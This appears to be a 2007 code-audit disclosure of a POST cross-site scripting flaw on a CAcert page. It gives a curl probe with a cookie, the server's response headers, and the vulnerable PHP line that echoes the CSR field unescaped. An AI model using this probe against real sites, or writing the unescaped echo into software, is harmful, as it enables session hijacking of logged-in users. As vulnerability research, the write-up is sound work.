https://www.cacert.org/gpg.php?id=0 POST[CSR] XSS
This is part of a code audit on cacert sources. Francesco 'ascii' Ongaro - www.ush.it
HTML POC
 >>> POST XSS and external source load POC <<<
I'm a gateway page, as used in post xss attacks.

 Click send to trigger the event.

 

Fast check
curl -ki "https://www.cacert.org/gpg.php?id=0" -d "CSR=TETE" -H "Cookie: cacert=7fac611e47816f58d1f4b9add77074fc"

HTTP/1.1 200 OK
Date: Sun, 07 Jan 2007 06:00:28 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_gzip/1.3.26.1a PHP/4.4.2-1.1 mod_ssl/2.8.25 OpenSSL/0.9.8a
X-Powered-By: PHP/4.4.2-1.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

Vulnerable code

pages/gpg/0.php:<?=$_POST['CSR']?>


Summary
- POST XSS
- magic quotes gpc ON
- Affected by user role (only logged in)